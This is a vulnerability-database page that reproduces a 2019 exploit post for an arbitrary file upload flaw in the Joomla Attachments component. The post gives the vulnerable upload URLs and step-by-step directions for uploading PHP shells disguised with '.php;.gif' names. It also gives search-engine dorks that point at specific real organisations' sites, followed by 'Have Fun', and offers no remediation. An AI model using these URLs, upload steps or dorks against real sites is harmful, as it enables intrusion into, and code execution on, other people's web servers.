Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Joomla Attachments 3.x File Upload

🗓️ 26 May 2019 00:00:00Reported by KingSkrupellosType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 194 Views

Joomla Attachments 3.x File Upload Vulnerability by KingSkrupello

Code
`####################################################################  
  
# Exploit Title : Joomla Com_Attachments Components 3.x Arbitrary File Upload  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 26/05/2019  
# Vendor Homepage : jmcameron.net  
# Software Download Links : jmcameron.net/attachments/  
jmcameron.net/attachments/updates/3.2.6/attachments-3.2.6.zip  
joomlacode.org/gf/download/frsrelease/18688/83852/attachments-2.2.2.zip  
joomlacode.org/gf/project/attachments/frs/  
github.com/sdc/DevonStudioSchool/tree/master/administrator/components/com_attachments/  
# Software Information Links : extensions.joomla.org/extension/attachments/  
joomlacode.org/gf/project/attachments/  
joomlacode.org/gf/project/attachments3/  
# Joomla Affected Versions :  
Joomla 3.4.8  
Joomla 3.5.1  
Joomla 3.6.5  
Joomla 3.8.1  
Joomla 3.8.11  
Joomla 3.8.3  
Joomla 3.9.6  
# Software Affected Versions [ Component Com_Attachments ] :   
2.2.2 and 3.2.6 - 3.x / All previous versions.  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Google Dorks :   
inurl:/index.php?option=com_attachments&task=upload  
intext:Copyright (C) 2006-2020 BSA Troop 444. All Rights Reserved.  
intext:Treadmill Desk from TrekDesk  
intext:Copyright © 2015 Ashleigh-D. All rights reserved. Website designed by Mojosync Pty Ltd using Joomla  
intext:Fundación Jesuitas Paraguay  
intext:© 2019 Mars Society Polska  
intext:Designed by atict.com  
intext:Copyright © 2017. All Rights Reserved.Webaloss - Realizzazione siti webwebaloss.com  
intext:Designed by Burosphere.  
intext:Conselho Nacional de Recursos Hídricos CNRH Ministerio Do Desenvolvimento Regional  
and more on Google and other Search Engines...... Have Fun....  
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
# Reference Link [ Similar ] : dl.packetstormsecurity.net/1902-exploits/joomlaattachments326-shell.txt  
  
####################################################################  
  
# Description about Software :  
***************************  
The 'Attachments' extension allows files to be uploaded and attached to content  
articles in Joomla. Includes a plugin to display attachments and a component  
for uploading and managing attachments.  
  
####################################################################  
  
# Impact :  
***********  
Joomla Attachments Components 3.x and other previous versions could allow a   
remote attacker to upload arbitrary files upload/shell upload, caused by the improper validation   
of file extensions by the multiple scripts to index.php. The issue occurs because   
the application fails to adequately sanitize user-supplied input.   
Exploiting this issue will allow attackers to execute arbitrary code within  
the context of the affected application. This may facilitate unauthorized access   
or privilege escalation; other attacks may also possible.   
By sending a specially-crafted HTTP request, a remote attacker could exploit   
this vulnerability to upload a malicious PHP script, which could allow the   
attacker to execute arbitrary PHP code on the vulnerable system.  
  
####################################################################  
  
# Arbitrary File Upload/Unauthorized File Insertion Exploit :  
****************************************************  
/index.php?option=com_attachments&task=upload&uri=file&parent_id=1&parent_type=com_content&tmpl=component&from=closeme  
  
/index.php?option=com_attachments&task=upload&uri=file&parent_id=[ARTICLE-ID-NUMBER]/&parent_type=com_content&tmpl=component&from=closeme  
  
Click to " Select file to upload instead " - Fill the Form - Published => '' Yes '' and Click " Public "  
  
Attach file: - Upload your .txt .jpg .gif .png .phtml .php;.gif file to the vulnerable system.  
  
# Directory File Path :  
********************  
/attachments/article/[ARTICLE-ID-NUMBER]/kingskrupellos.txt  
  
####################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
####################################################################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 May 2019 00:00Current
7.4High risk
Vulners AI Score7.4
joomlaattachmentsarbitrary file uploadcyberizm digital security armysoftwarevulnerabilitycwe-264packetstormsecuritycxsecurityexploit4arab
194